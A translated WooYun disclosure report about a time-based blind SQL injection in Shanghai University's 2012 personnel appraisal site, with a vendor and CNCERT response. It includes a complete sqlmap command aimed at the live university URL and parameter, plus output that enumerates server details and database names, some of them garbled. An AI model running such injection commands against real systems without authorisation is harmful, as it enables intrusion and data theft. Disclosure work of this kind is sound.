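Vulnerability Summary
Bug ID: wooyun-2015-0112789
Title: Shanghai University personnel appraisal 2012 MSSQL injection
Vendor: Shanghai University
Author: 夸父追日
Submitted: 2015-05-22 11:45
Fixed: 2015-07-11 11:44
Published: 2015-07-11 11:44
Vulnerability type: SQL injection
Severity: Medium
Self-assessed Rank: 5
Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling
Source: http://www.wooyun.org
Tags: None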
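Vulnerability Details
Disclosure status:
2015-05-22: Details reported to the vendor; awaiting vendor handling
2015-05-27: Vendor confirmed; details disclosed to the vendor only
2015-06-06: Details disclosed to core white hats and experts in related fields
2015-06-16: Details disclosed to regular white hats
2015-06-26: Details disclosed to intern white hats
2015-07-11: Details disclosed to the public
Brief description:
All I want is an invitation code.
Detailed description:
Time-based blind injection. It was too slow, so I only dumped a little; it takes too much time. I have verified that the injection really exists.
Proof of vulnerability:
Injection point: http://hreva.shu.edu.cn:8088/JobsList.aspx?dept=-1&spec=-1&sta=30000001&job=-1&pert=-1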
sqlmap.py -u "http://hreva.shu.edu.cn:8088/JobsList.aspx?dept=-1&spec=-1&sta=30000001&job=-1&pert=-1" -p "spec" --dbs
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
[17:03:09] [INFO] fetching database names
[17:03:09] [WARNING] the SQL query provided does not return any output
[17:03:09] [WARNING] in case of continuous data retrieval problems you are advi
ed to try a switch '--no-cast' or switch '--hex'
[17:03:09] [INFO] fetching number of databases
[17:03:09] [INFO] resumed: 64
[17:03:09] [INFO] resumed: AlumniDB
[17:03:09] [INFO] resumed: BaseCent\\?81r
[17:03:09] [INFO] resumed: BPM
[17:03:09] [INFO] resumed: bps
[17:03:09] [INFO] resumed: BSCS
[17:03:09] [INFO] resumed: bscs-new
[17:03:09] [INFO] resumed: emrsyytem
[17:03:09] [INFO] resumed: feidphs
[17:03:09] [INFO] resumed: gonghui
[17:03:09] [INFO] resumed: health
[17:03:09] [INFO] resumed: HISBS
[17:03:09] [INFO] resumed: hischemical
[17:03:09] [INFO] resumed: hisciemicalYC
[17:03:09] [INFO] resumed: HisFenxiyi
[17:03:09] [INFO] resumed: HISJD
[17:03:09] [WARNING] cannot properly display Unicode characters inside Windows
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances w
ll result in replacement with '?' character. Please, find proper character repr
sentation inside corresponding output files.
[17:03:09] [INFO] resumed: ?ISYC\x05!a
[17:03:09] [INFO] resumed: InfoPlus\x19
[17:03:09] [INFO] resumed: InfoPlus_Dev!
[17:03:09] [INFO] resumed: InfoPlusMembership
[17:03:09] [INFO] resumed: InfoPl\\?81sMembershrp_Dev\x05
[17:03:09] [INFO] resumed: InfoPlusStrteAi
[17:03:09] [INFO] resumed: InfoPlusStatg_Dev\n\x03\x02
[17:03:09] [INFO] resumed: InkoTest(a
[17:03:09] [INFO] resumed: JiraaB
[17:03:09] [INFO] resumed: jkg\\?81ptA\x12
[17:03:09] [INFO] resumed: }wcqutaa$
[17:03:09] [INFO] resumed: Li?p\\?81p
[17:03:09] [INFO] resumed: m?\\?81?\\?a3?i\\?81d\\?9fa????\\?81\x04dq?\x12\x11\
03\x03
[17:03:09] [INFO] resumed: ?a樂?p?\\?81a\\?f9餆谈cd敆_\x7fe弄\\?82\x11!\x06!\t\
[17:03:09] [INFO] resumed: mxs?\\?f9r}\x11K'3
[17:03:09] [INFO] resumed: 'a???i??!!
[17:03:09] [INFO] resumed: \\?beaw攂?嵊a?\\?84\x03
[17:03:09] [INFO] resumed: M瀆焁z輁m?u缄#
[17:03:09] [INFO] resumed: M?B\\?a4
[17:03:09] [WARNING] time-based comparison requires larger statistical model, p
ease wait.............................
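Suggested fix:
Uh
Copyright notice: please credit the source when reposting: 夸父追日@乌云 (WooYun)
Vulnerability Response
Vendor response:
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-05-27 11:43
Vendor reply:
CNVD has confirmed the situation described and has passed it through CNCERT to Sai'er Education (赛尔教育), which will coordinate follow-up handling with the organization that manages the website.
Latest status:
None yet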